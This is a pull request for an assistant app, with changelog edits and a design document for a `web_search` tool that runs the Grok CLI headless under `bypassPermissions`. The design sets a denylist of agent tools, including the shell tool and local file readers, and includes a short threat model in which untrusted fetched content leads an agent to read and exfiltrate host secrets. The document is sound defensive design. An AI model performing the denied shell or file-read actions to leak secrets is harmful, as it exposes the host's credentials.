### PR TITLE
feat(voice): web_search tool + Realtime speakerphone and Thread recovery

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -49,7 +49,7 @@
 ### Fixed
 
 - Fixed Thread voice getting stuck on connecting after Realtime by recovering a stale Realtime owner fence so adapter/assistant sockets can return to idle.
-- Fixed Realtime speakerphone so A2DP-only Bluetooth devices no longer suppress loudspeaker (only SCO/BLE headsets trigger SCO routing).
+- Fixed Realtime speakerphone so A2DP-only Bluetooth devices no longer suppress loudspeaker (only SCO/BLE headsets trigger SCO routing), and force the built-in speaker via `setCommunicationDevice` on API 31+ so media-only BT speakers do not leave voice on the quiet earpiece.
 - Fixed Android Realtime ownership and lease lifecycle: Thread path no longer stomps Realtime runtime state, Realtime callbacks are generation-fenced, WebRTC release completes dispose/server close, server reaps live sessions after missed heartbeats, hangup uses a success close token, and the Realtime wake lock is not capped at one hour. ([#113](https://github.com/kcosr/assistant/pull/113))
 - Fixed the Lists header pinned tag chip to show only the pin icon while preserving accessible labeling. ([#112](https://github.com/kcosr/assistant/pull/112))
 - Fixed Electron desktop HTML links and time-tracker XLSX export clicks so they open in the system browser/download path instead of being captured inside the Electron webview. ([#108](https://github.com/kcosr/assistant/pull/108))

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -49,6 +49,7 @@
 ### Fixed
 
 - Fixed Thread voice getting stuck on connecting after Realtime by recovering a stale Realtime owner fence so adapter/assistant sockets can return to idle.
+- Fixed Realtime speakerphone so A2DP-only Bluetooth devices no longer suppress loudspeaker (only SCO/BLE headsets trigger SCO routing).
 - Fixed Android Realtime ownership and lease lifecycle: Thread path no longer stomps Realtime runtime state, Realtime callbacks are generation-fenced, WebRTC release completes dispose/server close, server reaps live sessions after missed heartbeats, hangup uses a success close token, and the Realtime wake lock is not capped at one hour. ([#113](https://github.com/kcosr/assistant/pull/113))
 - Fixed the Lists header pinned tag chip to show only the pin icon while preserving accessible labeling. ([#112](https://github.com/kcosr/assistant/pull/112))
 - Fixed Electron desktop HTML links and time-tracker XLSX export clicks so they open in the system browser/download path instead of being captured inside the Electron webview. ([#108](https://github.com/kcosr/assistant/pull/108))

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -8,6 +8,7 @@
 
 ### Added
 
+- Added Realtime speakerphone preference (default on) so duplex voice uses the phone loudspeaker when no Bluetooth headset is connected, instead of the quiet earpiece.
 - Added built-in `web_search` tool that runs local Grok CLI headless research (live web and public X) with optional `continue` resume, for text agents and Realtime allowlists.
 - Added Android Realtime voice end-to-end: server `/api/voice/*` (conversation/session, OpenAI SDP negotiate, sideband lists tools, events), Android WebRTC Realtime client with exclusive-owner preemption, wake lock, start/stop/mute plugin APIs, config tool allowlist/denylist globs, `realtime_end_session` hangup, headset media-button start/stop, and web settings/FAB controls. Uses server-side `OPENAI_API_KEY` only. ([#113](https://github.com/kcosr/assistant/pull/113))
 - Added Android native voice foundations for exclusive Thread vs Realtime ownership: generation-fenced controller helpers, shared audio router (focus/mode/SCO), Thread queue stop/clear/pause-admission hooks, and a `voiceRuntimeMode` preference. ([#113](https://github.com/kcosr/assistant/pull/113))
@@ -47,6 +48,7 @@
 
 ### Fixed
 
+- Fixed Thread voice getting stuck on connecting after Realtime by recovering a stale Realtime owner fence so adapter/assistant sockets can return to idle.
 - Fixed Android Realtime ownership and lease lifecycle: Thread path no longer stomps Realtime runtime state, Realtime callbacks are generation-fenced, WebRTC release completes dispose/server close, server reaps live sessions after missed heartbeats, hangup uses a success close token, and the Realtime wake lock is not capped at one hour. ([#113](https://github.com/kcosr/assistant/pull/113))
 - Fixed the Lists header pinned tag chip to show only the pin icon while preserving accessible labeling. ([#112](https://github.com/kcosr/assistant/pull/112))
 - Fixed Electron desktop HTML links and time-tracker XLSX export clicks so they open in the system browser/download path instead of being captured inside the Electron webview. ([#108](https://github.com/kcosr/assistant/pull/108))

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -8,6 +8,7 @@
 
 ### Added
 
+- Added built-in `web_search` tool that runs local Grok CLI headless research (live web and public X) with optional `continue` resume, for text agents and Realtime allowlists.
 - Added Android Realtime voice end-to-end: server `/api/voice/*` (conversation/session, OpenAI SDP negotiate, sideband lists tools, events), Android WebRTC Realtime client with exclusive-owner preemption, wake lock, start/stop/mute plugin APIs, config tool allowlist/denylist globs, `realtime_end_session` hangup, headset media-button start/stop, and web settings/FAB controls. Uses server-side `OPENAI_API_KEY` only. ([#113](https://github.com/kcosr/assistant/pull/113))
 - Added Android native voice foundations for exclusive Thread vs Realtime ownership: generation-fenced controller helpers, shared audio router (focus/mode/SCO), Thread queue stop/clear/pause-admission hooks, and a `voiceRuntimeMode` preference. ([#113](https://github.com/kcosr/assistant/pull/113))
 - Wait for the agent-voice-adapter client identity before starting direct TTS playback from the Android voice queue, and drain the queue once the identity arrives. ([#113](https://github.com/kcosr/assistant/pull/113))

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -8,8 +8,8 @@
 
 ### Added
 
-- Added Realtime speakerphone preference (default on) so duplex voice uses the phone loudspeaker when no Bluetooth headset is connected, instead of the quiet earpiece.
-- Added built-in `web_search` tool that runs local Grok CLI headless research (live web and public X) with optional `continue` resume, for text agents and Realtime allowlists.
+- Added Realtime speakerphone preference (default on) so duplex voice uses the phone loudspeaker when no Bluetooth headset is connected, instead of the quiet earpiece. ([#114](https://github.com/kcosr/assistant/pull/114))
+- Added built-in `web_search` tool that runs local Grok CLI headless research (live web and public X) with optional `continue` resume, for text agents and Realtime allowlists. ([#114](https://github.com/kcosr/assistant/pull/114))
 - Added Android Realtime voice end-to-end: server `/api/voice/*` (conversation/session, OpenAI SDP negotiate, sideband lists tools, events), Android WebRTC Realtime client with exclusive-owner preemption, wake lock, start/stop/mute plugin APIs, config tool allowlist/denylist globs, `realtime_end_session` hangup, headset media-button start/stop, and web settings/FAB controls. Uses server-side `OPENAI_API_KEY` only. ([#113](https://github.com/kcosr/assistant/pull/113))
 - Added Android native voice foundations for exclusive Thread vs Realtime ownership: generation-fenced controller helpers, shared audio router (focus/mode/SCO), Thread queue stop/clear/pause-admission hooks, and a `voiceRuntimeMode` preference. ([#113](https://github.com/kcosr/assistant/pull/113))
 - Wait for the agent-voice-adapter client identity before starting direct TTS playback from the Android voice queue, and drain the queue once the identity arrives. ([#113](https://github.com/kcosr/assistant/pull/113))

--- a/docs/CONFIG.md
+++ b/docs/CONFIG.md
@@ -86,6 +86,43 @@ Realtime duplex voice reuses the same server-side OpenAI credential as TTS/chat:
 
 Capability probe: `GET /api/voice/capabilities` reports `agentRealtime.status` as `ready` or `not-configured`.
 
+#### Realtime tool allowlist (`config.json`)
+
+Realtime tool exposure is **explicit opt-in**. Configure under `voice.realtime`:
+
+```json
+{
+  "voice": {
+    "realtime": {
+      "toolAllowlist": ["lists_*", "web_search"],
+      "toolDenylist": []
+    }
+  }
+}
+```
+
+| Field | Description |
+| --- | --- |
+| `toolAllowlist` | Glob patterns for tool names available on Realtime sessions. Missing or empty ⇒ **no** host tools (hangup may still be built-in). |
+| `toolDenylist` | Optional globs removed after allowlist matching. |
+| `instructions` | Optional system-instruction override for the Realtime model. |
+
+Text agents use per-agent `toolAllowlist` / `toolDenylist` independently of this block.
+
+#### Built-in `web_search` tool
+
+`web_search` is a **built-in** tool (not a plugin). It runs the local Grok CLI headless for live public web and X research.
+
+| Item | Detail |
+| --- | --- |
+| Parameters | `query` (required natural-language question), `continue` (optional bool to resume prior Grok session for this conversation) |
+| Enable for text agents | Add `web_search` to the agent’s `toolAllowlist` |
+| Enable for Realtime | Add `web_search` to `voice.realtime.toolAllowlist` |
+| Host prerequisites | `grok` on `PATH` (or `ASSISTANT_GROK_BIN`); Grok auth (`~/.grok/auth.json` and/or `XAI_API_KEY`); do not lock off `bypassPermissions` in Grok requirements; avoid untrusted Grok MCP servers for the service user |
+| Not the same as | Plugin `search_*` tools (in-app notes/lists search) |
+
+Design: `docs/design/web-search-tool.md`.
+
 ### ElevenLabs TTS
 
 Used when `TTS_BACKEND=elevenlabs`.

--- a/docs/design/web-search-tool.md
+++ b/docs/design/web-search-tool.md
@@ -129,15 +129,17 @@ Same tool and schema. Host may apply **different timeouts / max-turns** based on
 
 | | Realtime | Text agent |
 |--|----------|--------------|
-| Process timeout | **≤20s** (default 18s) | ~90–120s |
-| `--max-turns` | Low (e.g. 6) | Higher (e.g. 12–16) |
+| Process timeout | **Same as text** (~100s) | ~100s |
+| `--max-turns` | Low (e.g. 6) for shorter research loops | Higher (e.g. 12–16) |
 | Optional `--rules` brevity | Spoken 1–3 sentences default | Slightly longer OK |
+
+Realtime tool execution does **not** block spoken conversation (sideband tool calls can complete while the user continues talking), so a short Realtime-only wall-clock cap is unnecessary.
 
 Detection (v1): there is no `isRealtime` on `ToolContext` today. Use a **shared constant** for the Realtime session key prefix (`voice:`), exported from the voice module (or a tiny shared constant used by both `VoiceService` and the web_search handler). Unit-test both timeout branches. Optionally add an explicit `ToolContext` field later; do not invent parallel detection schemes.
 
 Realtime `ToolContext` may omit `toolCallId` / `requestId` / `turnId`; the handler must not require them.
 
-**Latency UX:** Realtime `executeToolCall` awaits the tool before continuing speech. Cap Realtime hard at ≤20s so the provider is less likely to desync. The calling model (not this tool) may say a short filler before the tool call; the tool itself returns a short speakable error on timeout (e.g. “Research timed out”). No streaming bridge in v1.
+**Latency UX:** Realtime can keep conversing while a tool runs; use the same process timeout as text. The tool still returns a short speakable error on timeout (e.g. “Research timed out”). No streaming bridge in v1.
 
 Do **not** add a `mode` parameter for the calling agent in v1.
 
@@ -312,7 +314,7 @@ Under `## [Unreleased]` → `### Added`:
 6. `continue: true` with no prior session returns a clear error.
 7. Tool description instructs natural-language questions; implementation does not invent multi-tool surface for web vs X.
 8. Subprocess uses argv-array spawn with `shell: false`; model-controlled `query` is never shell-interpolated.
-9. Realtime path uses ≤20s timeout and speakable timeout errors.
+9. Realtime path uses the same process timeout as text and speakable timeout errors.
 10. Unit tests cover the above with mocked Grok; optional live web/X when env flag set.
 11. Running config prepared for `assistant` + Realtime; no deploy/restart required for merge readiness.
 12. No naming collision with `search_*` in-app search plugin.
@@ -338,7 +340,7 @@ Under `## [Unreleased]` → `### Added`:
 | Enablement? | **Allowlists only** |
 | Strict `--tools` web-only? | **No** — omit `--tools`; denylist dangerous tools so X remains available |
 | Spawn? | **argv-array, `shell: false` only** |
-| Realtime timeout? | **≤20s** |
+| Realtime timeout? | **Same as text (~100s)** — tools do not block spoken turns |
 | Permission mode? | **`bypassPermissions` + denylist** (required for headless web_fetch/X) |
 | MCP? | **Deny MCP tools if supported; require trusted host Grok MCP config** |
 

--- a/docs/design/web-search-tool.md
+++ b/docs/design/web-search-tool.md
@@ -1,0 +1,408 @@
+# Built-in `web_search` Tool (Grok CLI Research)
+
+Status: Ready for implementation (post Keel spec-review iterations)  
+Date: 2026-07-19  
+Branch: `feature/web-search-grok-tool`
+
+## 1. Summary
+
+Add a **built-in** Assistant tool named `web_search` that shells out to the local **Grok Build CLI** in headless one-shot mode for live web and public X/Twitter research.
+
+One tool is shared by:
+
+1. **Traditional text agents** (e.g. `assistant`), via per-agent `toolAllowlist`
+2. **Realtime voice**, via `voice.realtime.toolAllowlist`
+
+The calling agent does **not** get separate tools for web vs X vs fetch. It passes a **natural-language question** in `query`. Grok uses its own web/X tools under a narrow allowlist. An optional `continue` flag resumes the prior Grok session for the same Assistant conversation.
+
+## 2. Goals
+
+- Single agent-facing tool for live internet research (web + public X).
+- Usable from text chat and Realtime with the same tool name and schema.
+- Prefer Grok’s research tools; **deny shell and nested agents**.
+- Tool **description** requires natural-language questions (no heavy query rewriting).
+- Multi-turn follow-ups via `continue: true` → Grok `--resume <sessionId>`.
+- Config-only enablement (allowlists); no plugin package, panel, or CLI product surface.
+
+## 3. Non-goals
+
+- Plugin packaging, HTTP ops, generated CLI, or enable UI.
+- Separate tools per Grok capability (`web_fetch`, `x_keyword_search`, …).
+- Posting to X, DMs, private notifications, or write APIs.
+- Running Grok on the Android client (server-side only).
+- Guaranteeing every `x_*` tool is filterable via Grok `--tools` (prompt + allowlist best-effort).
+- Deploying or restarting production/dev systemd as part of this change.
+
+## 4. Background
+
+CLI contract and invocation details originated in:
+
+`/home/kevin/agent-context/repos/assistant/specs/grok-cli-web-x-search-agent-tool.md`
+
+This design binds that CLI to Assistant’s **built-in tool host**.
+
+## 5. Product surface
+
+### 5.1 Tool name
+
+`web_search`
+
+### 5.2 Parameters
+
+| Field | Type | Required | Description |
+|-------|------|----------|-------------|
+| `query` | string | yes | Natural-language question or research request. Not bare keyword lists. |
+| `continue` | boolean | no | When true, resume the last Grok session for this Assistant conversation. Default false. |
+
+`additionalProperties: false`.
+
+### 5.3 Tool description (normative for the model)
+
+Use text equivalent to:
+
+> Search the live public web and public X/Twitter for current information.  
+> Pass `query` as a full natural-language question or request  
+> (e.g. "What is the weather in Austin today?" or "What has @user posted recently about robots?").  
+> Do not pass bare keyword lists.  
+> Set `continue` to true only when following up on the previous search in this conversation.
+
+### 5.4 Result shape (to the model)
+
+Successful JSON object (example):
+
+```json
+{
+  "text": "…answer…",
+  "continued": false,
+  "sessionId": "optional-opaque-id-for-debug"
+}
+```
+
+- `text` is the primary payload for chat display / Realtime speech.
+- `continued` reflects whether resume was used.
+- `sessionId` may be omitted from model-facing results if undesired; implementers may include a truncated id for debugging. Prefer not requiring the **calling** agent to manage Grok session IDs — resume is only via `continue`.
+
+Errors: structured tool error with short, speakable message (e.g. invalid args, grok missing, timeout, non-zero exit, no prior session for continue).
+
+## 6. Architecture
+
+### 6.1 Registration
+
+- Register in `registerBuiltInSessionTools` (or a dedicated helper it calls), same pattern as `voice_speak` / `attachment_send`.
+- Always present on the built-in tool host when the host is created.
+- **Visibility** is solely allowlist/denylist:
+
+  - Agents: `agents[].toolAllowlist` includes `web_search`
+  - Realtime: `voice.realtime.toolAllowlist` includes `web_search`
+
+### 6.2 Execution
+
+On `callTool("web_search", …)`:
+
+1. Validate `query` (non-empty string after trim).
+2. Resolve conversation key for Grok session storage (see §6.3).
+3. If `continue === true`, look up stored Grok `sessionId`; if missing → error `no_prior_search`.
+4. Build argv for Grok headless (see §7).
+5. Run subprocess with timeout; capture stdout/stderr.
+6. On exit 0, parse JSON (`--output-format json`); require usable `text`.
+7. Persist returned Grok `sessionId` for this conversation key.
+8. Return `{ text, continued }` to the tool host.
+
+### 6.3 Session keying for `continue`
+
+Store Grok session ids in **process memory** (Map) for v1:
+
+| Caller | Key |
+|--------|-----|
+| Text agent | `ctx.sessionId` (chat session) |
+| Realtime | `ctx.sessionId` as provided by voice service (today `voice:<conversationId>`) |
+
+Do **not** use Grok’s bare `-c` / “latest in cwd” for resume — concurrent conversations would collide.
+
+Stable `--cwd` for Grok: a server data subdirectory (e.g. under `DATA_DIR` / `envConfig.dataDir`), e.g. `<dataDir>/grok-web-search`, created if missing. Same cwd for all calls is fine because resume uses explicit `--resume`.
+
+Process restart clears in-memory sessions → `continue: true` fails until a new search; acceptable for v1.
+
+### 6.4 Realtime vs text policy
+
+Same tool and schema. Host may apply **different timeouts / max-turns** based on context:
+
+| | Realtime | Text agent |
+|--|----------|--------------|
+| Process timeout | **≤20s** (default 18s) | ~90–120s |
+| `--max-turns` | Low (e.g. 6) | Higher (e.g. 12–16) |
+| Optional `--rules` brevity | Spoken 1–3 sentences default | Slightly longer OK |
+
+Detection (v1): there is no `isRealtime` on `ToolContext` today. Use a **shared constant** for the Realtime session key prefix (`voice:`), exported from the voice module (or a tiny shared constant used by both `VoiceService` and the web_search handler). Unit-test both timeout branches. Optionally add an explicit `ToolContext` field later; do not invent parallel detection schemes.
+
+Realtime `ToolContext` may omit `toolCallId` / `requestId` / `turnId`; the handler must not require them.
+
+**Latency UX:** Realtime `executeToolCall` awaits the tool before continuing speech. Cap Realtime hard at ≤20s so the provider is less likely to desync. The calling model (not this tool) may say a short filler before the tool call; the tool itself returns a short speakable error on timeout (e.g. “Research timed out”). No streaming bridge in v1.
+
+Do **not** add a `mode` parameter for the calling agent in v1.
+
+## 7. Grok CLI invocation
+
+Binary: `grok` on `PATH`, or configurable override via env `ASSISTANT_GROK_BIN` (optional; default `grok`).
+
+### 7.0 Spawn mechanics (normative — security)
+
+**Must** use argv-array spawn with `shell: false`. Never interpolate `query` into a shell string.
+
+```ts
+spawn(grokBin, args, { shell: false, cwd: stableWorkdir, signal: abortSignal });
+// args example:
+// ['-p', query, '--disallowed-tools', denylist, '--output-format', 'json', ...]
+```
+
+- Each flag and value is a separate array element; `query` is its own element after `-p`.
+- Honor `ctx.signal` when present; always enforce a process timeout via abort/kill.
+- Do **not** reuse `executeShellCommand` / `/bin/sh -c` helpers.
+
+### 7.1 Tool filtering strategy (web + X, no shell)
+
+Grok headless `--tools` is a **strict allowlist** of built-in tool ids. Using `--tools "web_search,web_fetch"` would **remove** other tools, including X tools that are a product goal.
+
+**v1 decision:**
+
+1. **Do not** pass `--tools` (default research tool set remains, including web and X when available).
+2. **Primary tool-list boundary:** `--disallowed-tools` removes dangerous **built-in** tools by id.
+3. **Permission mode for headless:** use `--permission-mode bypassPermissions` (same family as always-approve) so `web_fetch` and X tools are not cancelled for prompting. In headless default mode, non-auto-approved tools are cancelled; only a small set (including `web_search` alone) is auto-approved. Without bypass, X/fetch research is non-functional.
+4. Thin `--rules` steer web vs X; rules are **not** a security control.
+
+This reconciles earlier “no yolo” guidance: we still **do not** leave shell/edit available. Bypass is only safe **with** the denylist (and deny rules) below. Deny rules and hooks still apply under bypass.
+
+#### Denylist (normative, unconditional)
+
+Single constant string for `--disallowed-tools` (always the same argv; do not gate “if present”):
+
+```text
+run_terminal_cmd,Agent,search_replace,write,read_file,list_dir,grep,memory_search,image_gen,image_edit,image_to_video,reference_to_video
+```
+
+**Why local reads are denied:** Under bypassPermissions, `read_file` / `list_dir` / `grep` are otherwise available and auto-approved as “read-only.” Combined with `web_fetch` and untrusted returned content, that would enable reading host secrets into the research channel. Web/X research does **not** need local filesystem tools, so deny them. Also deny `memory_search` (cross-session memory is out of scope for this tool).
+
+**Residual (web_fetch):** `web_fetch` is intentional for research. It remains an egress primitive. Closing local-file tools **removes the local-read half of classic secret exfil**, but does **not** by itself prove SSRF hardening (`file://`, loopback, link-local, RFC1918). Implementer must verify the installed Grok’s `web_fetch` scheme/host behavior once (document findings in a short code comment or test note). Grok `--sandbox` does **not** fully constrain `web_fetch` egress—do not claim otherwise. Optional later: `WebFetch(domain:…)` allow rules if product needs host allowlists.
+
+Unknown ids are treated as no-ops by Grok’s denylist (if a future Grok version errors on unknown ids, drop the unknown names in a follow-up). Keep one constant in code.
+
+#### MCP boundary
+
+Headless docs: **MCP meta-tools remain available** unless denied and are retained even with `--tools` / `--disallowed-tools`.
+
+v1 requirements:
+
+- **Deploy prerequisite:** host Grok config for the agent-server user should not enable untrusted MCP servers for research calls.
+- **Belt-and-suspenders argv:** pass permission deny for MCP tools when supported, e.g. `--deny 'MCPTool(*)'` (or the current Grok-equivalent deny pattern documented for MCP). If the installed Grok rejects an unsupported deny pattern, document the tested flag and fall back to the deploy prerequisite only.
+- Document both in CONFIG.md.
+
+Optional later: OS sandbox profile if Grok’s `--sandbox` proves reliable for this host.
+
+### 7.2 New search (`continue` false/absent)
+
+Logical argv (not a shell string):
+
+```text
+grok
+  -p <query>
+  --permission-mode bypassPermissions
+  --disallowed-tools run_terminal_cmd,Agent,search_replace,write,read_file,list_dir,grep,memory_search,image_gen,image_edit,image_to_video,reference_to_video
+  --deny MCPTool(*)
+  --output-format json
+  --cwd <stable-workdir>
+  --max-turns <N>
+  --rules <fixed-rules>
+```
+
+(`--deny MCPTool(*)` may be adjusted to the exact pattern accepted by the installed Grok; implementer verifies once and freezes the constant.)
+
+### 7.3 Continue
+
+Same argv plus:
+
+```text
+  --resume <stored-session-id>
+```
+
+### 7.4 Fixed rules (thin, not query rewriting)
+
+Append via `--rules` approximately:
+
+```text
+Use web_search and web_fetch for general web facts.
+Use X tools for posts, accounts, and threads when the question is about X/Twitter.
+Do not run shell commands or edit files.
+Prefer current information over stale knowledge.
+```
+
+Realtime may append: `Answer for spoken voice in 1–3 sentences unless the user asked for detail.`
+
+**Do not** rephrase or heavily wrap `query`. Pass the agent’s natural-language question as the `-p` argument value.
+
+### 7.5 Security summary
+
+- Argv-array spawn only (`shell: false`).
+- `--permission-mode bypassPermissions` only with a hard denylist (and MCP deny when available)—not unrestricted yolo.
+- Denylist removes shell, nested Agent, file mutation, **local file reads/search**, image gen.
+- MCP: deny rule + deploy prerequisite (no untrusted MCP on host Grok).
+- Treat returned `text` as untrusted research for the outer model.
+- Do not log full query/answer at info level; debug optional.
+
+### 7.6 Auth / deploy prerequisite
+
+Host process user must already have Grok credentials (`~/.grok/auth.json` and/or `XAI_API_KEY`). Document in CONFIG.md. Failure modes: exit non-zero → tool error, no invented facts.
+
+Also document:
+
+- Grok MCP servers for that user should be empty or trusted only.
+- **`bypassPermissions` must not be locked off** for the agent-server user (check `~/.grok/requirements.toml` and `/etc/grok/requirements.toml` for `disable_bypass_permissions_mode` / legacy `yolo = false`). If locked, headless `web_fetch`/X degrade silently; live acceptance tests should catch this.
+
+### 7.7 dataDir / envConfig
+
+`ctx.envConfig` is optional on the type. Handler must guard undefined: if missing `dataDir`, fall back to `os.tmpdir()/assistant-grok-web-search` or fail with a clear configuration error. Prefer `ctx.envConfig.dataDir` when present.
+
+## 8. Config changes
+
+### 8.1 Example / docs
+
+- `packages/agent-server/data/config.example.json`: add `web_search` to sample agent allowlist(s) and to `voice.realtime.toolAllowlist` alongside existing entries.
+- `docs/CONFIG.md`:
+  - Document **`voice.realtime.toolAllowlist` / `toolDenylist`** (Realtime opt-in tool surface).
+  - Document built-in tools including **`web_search`**: purpose, parameters, Grok prerequisites, distinction from `search_*` (in-app search plugin).
+
+### 8.2 Running instance (this environment)
+
+Update `/home/kevin/.assistant/data/config.json` (DATA_DIR for `assistant.service`):
+
+- Agent `assistant`: add `web_search` to `toolAllowlist`
+- `voice.realtime.toolAllowlist`: add `web_search` (keep existing entries such as `lists_*`)
+
+**Note:** Without a service restart, the running process will not load config changes. This work **does not** restart services; enablement is prepared for the next deploy/restart.
+
+## 9. Testing
+
+- Unit tests with mocked subprocess (argv capture, `shell: false`):
+  - happy path JSON parse + session store
+  - `continue` without prior session → error
+  - `continue` with prior session → argv includes `--resume`
+  - non-zero exit → tool error
+  - empty query → invalid_arguments
+  - Realtime vs text timeout / max-turns selection (prefix constant)
+  - argv includes denylist and does **not** pass restrictive `--tools` that would drop X
+  - spawn uses `shell: false` (assert mock options)
+- Optional live tests when `ASSISTANT_GROK_LIVE_TEST=1`:
+  - web fact query returns non-empty text
+  - X-oriented query (e.g. recent public posts about a well-known handle/topic) can succeed when X tools are available (soft assert / skip if environment lacks X)
+
+## 10. Changelog
+
+Under `## [Unreleased]` → `### Added`:
+
+- Built-in `web_search` tool wrapping Grok CLI for live web/X research, with optional `continue` resume, for text agents and Realtime allowlists.
+
+(PR number filled when PR is opened.)
+
+## 11. Acceptance criteria
+
+1. Built-in tool `web_search` appears in tool host list when registered.
+2. Agent with `web_search` on allowlist can call it; without allowlist entry, call is denied.
+3. Realtime allowlist can expose the same tool independently of agent config.
+4. New search invokes Grok **without** a restrictive `--tools` allowlist that would drop X; denylist removes shell/agent/file-mutation tools; returns `text`.
+5. Second call with `continue: true` in the same conversation resumes the stored Grok session.
+6. `continue: true` with no prior session returns a clear error.
+7. Tool description instructs natural-language questions; implementation does not invent multi-tool surface for web vs X.
+8. Subprocess uses argv-array spawn with `shell: false`; model-controlled `query` is never shell-interpolated.
+9. Realtime path uses ≤20s timeout and speakable timeout errors.
+10. Unit tests cover the above with mocked Grok; optional live web/X when env flag set.
+11. Running config prepared for `assistant` + Realtime; no deploy/restart required for merge readiness.
+12. No naming collision with `search_*` in-app search plugin.
+
+## 12. Implementation plan
+
+1. Add design doc (this file); Keel `spec-review-loop` until clean.
+2. Implement Grok runner + session map + built-in registration.
+3. Tests + CONFIG/example updates.
+4. Patch running `config.json` allowlists.
+5. Keel `iterative-review` on the implementation; fix agreed findings.
+6. Commit on feature branch; **do not** deploy or restart.
+
+## 13. Open questions (resolved for v1)
+
+| Question | Decision |
+|----------|----------|
+| Plugin vs built-in? | **Built-in** |
+| Separate tools for X? | **No** — one tool |
+| Prefix/rewrite query? | **No** — description + thin `--rules` only |
+| Resume mechanism? | **`continue` + stored session id + `--resume`** |
+| Session storage? | **In-memory Map, process-local** |
+| Enablement? | **Allowlists only** |
+| Strict `--tools` web-only? | **No** — omit `--tools`; denylist dangerous tools so X remains available |
+| Spawn? | **argv-array, `shell: false` only** |
+| Realtime timeout? | **≤20s** |
+| Permission mode? | **`bypassPermissions` + denylist** (required for headless web_fetch/X) |
+| MCP? | **Deny MCP tools if supported; require trusted host Grok MCP config** |
+
+## Correspondence
+
+### 2026-07-19T17:58:58.883Z - Reviewer: claude-default
+
+Status: **changes-requested**
+
+Reviewed against the current codebase. The core wiring is sound and implementable: `registerBuiltInSessionTools` (`builtInTools.ts:1183`) is the right home and matches the `voice_speak`/`attachment_send` pattern; the built-in host is created once in `createToolHost` and is **shared with Realtime** (`index.ts:176`), so an allowlisted `web_search` is reachable from both text and voice. `ToolContext.sessionId` is present and required, `ctx.envConfig` is populated on both the chat tool-call path (`ws/toolCallHandling.ts:455`) and the Realtime path (`index.ts:184`), so `<envConfig.dataDir>/grok-web-search` for `--cwd` works. Allowlists are glob-matched (`tools/scoping.ts`), support `lists_*`-style wildcards, and Realtime is explicit opt-in (empty ⇒ no tools), so `web_search` must be added explicitly to `voice.realtime.toolAllowlist` exactly as §8 states. The Realtime `sessionId` is confirmed as `voice:<conversationId>` (`voice/service.ts:493`), matching §6.3/§6.4. **No conflict with the `search_*` plugin**: that plugin registers `search_search`/`search_scopes`, `web_search` does not match the `search_*` prefix, and built-in tools take execution precedence in `CompositeToolHost`; the only theoretical shadow would be a future plugin whose id is `web` with a `search` operation.
+
+Blocking/again-worth-resolving items before implementation (details in structured findings):
+
+1. **[High] `--tools "web_search,web_fetch"` likely disables X search** — a headline goal (§1/§2) and advertised in the tool description (§5.3 `@user posted…`). If `--tools` is a strict enable-list, `x_*` tools are excluded; the background contract even says `x_*` filtering "may be incomplete," so they can't be reliably enumerated into `--tools`. Acceptance #4 tests only web, so this ships broken and untested. Pin down Grok's `--tools` semantics, choose allowlist-with-x_* vs denylist-only, and add an X-specific acceptance/live test.
+2. **[Medium] Denylist `run_terminal_cmd,Agent` is incomplete and its relationship to `--tools` is unspecified.** If `--tools` is dropped/loosened to enable X, the denylist becomes the sole security boundary and does not cover file write/edit tools (the §7.3 rules literally say "do not … edit files," implying such a tool exists). Enumerate all dangerous tool ids, state which flag is authoritative, and add an acceptance criterion that shell/file-mutation tools are not invokable. Prompt `--rules` are not a security control.
+3. **[Medium] Realtime timeout blocks the live turn.** `executeToolCall` awaits `callTool` with no outer timeout/cancellation (`voice/service.ts:496`), so a 25–45s Grok subprocess (§6.4) means up to 45s of dead air with no spoken filler, and the Realtime provider's tolerance for multi-second synchronous tool latency is unvalidated. Tighten the Realtime cap, validate provider behavior, ensure the timeout error is a short speakable message, and note there is no per-tool rate limit on the Realtime path (unlike the chat path).
+4. **[Medium] Mandate argv-array spawn, never a shell.** `query` is fully model-controlled; the §7 `grok -p "<query>"` bash snippets and the nearby `executeShellCommand` helper (which uses `/bin/sh -c`) invite a shell-injection bug. Require `spawn('grok', [argv…], { shell: false })` with `ctx.signal` + `setTimeout` kill.
+5. **[Low] Realtime detection is prefix-sniffing with no ToolContext flag.** Confirmed no caller-type field exists; centralize the `voice:` constant, add tests for both timeout branches, and note the Realtime ctx omits `toolCallId`/`requestId`/`turnId` so the handler must not depend on them.
+6. **[Low] Docs gap.** CONFIG.md has no `voice.realtime` section today, so §8.1 must add documentation for the `voice.realtime.toolAllowlist` field itself (not just a `web_search` blurb), and the handler should guard `ctx.envConfig` being undefined (optional on the type).
+
+### 2026-07-19T18:05:56.315Z - Reviewer: claude-default
+
+Status: **changes-requested**
+
+All six findings from the prior review are resolved well: the strict-`--tools` trap is replaced with a denylist-authoritative model (§7.1), argv-array `shell: false` spawn is now normative (§7.0), the Realtime cap is ≤20s with a speakable timeout (§6.4), the `voice:` prefix is a shared constant with both timeout branches tested (§6.4, §9), CONFIG.md coverage and the `ctx.envConfig` guard are specified (§8.1, §7.7), and X acceptance/live tests were added (§9, §11). I verified the revised invocation against the installed Grok headless docs (`~/.grok/docs/user-guide/14-headless-mode.md`, `22-permissions-and-safety.md`). Confirmed correct: `--disallowed-tools` wins over `--tools` and is retained (14-headless §Tool Filtering); the shell id is `run_terminal_cmd`; `search_replace`/`write` are the file-edit ids; `Agent`/`Agent(explore)` entries block subagents. Two new blocking/again-worth-resolving issues surfaced by that doc check, plus one low:
+
+1. **[High] No permission mode specified → `web_fetch` and X tools get cancelled in headless, so the X capability is still non-functional.** Per `22-permissions-and-safety.md`, only a fixed read-only set is auto-approved — **`web_search` is on it, but `web_fetch` and the `x_*` tools are not.** In headless `-p`, a tool call that would prompt is **cancelled and reported to the model** (14-headless / permissions §"In headless runs"), and the default mode prompts for anything not pre-approved (`dontAsk` would deny). §7.2's argv sets **no `--permission-mode` and no `--allow` rules**, and §7.5 bans always-approve — so under the effective default, only bare `web_search` runs; `web_fetch` and every `x_*` tool are cancelled. That defeats the headline web+X goal (§1/§2) advertised in the tool description (§5.3), and acceptance #4 wouldn't catch it (it only checks `--tools`/denylist, not that X actually executes). Resolve by specifying permission handling explicitly: either (a) since the denylist already removes shell/agent/edit/write/media and `deny` rules + hooks still apply under always-approve, use `--permission-mode bypassPermissions` on the hardened toolset (this contradicts 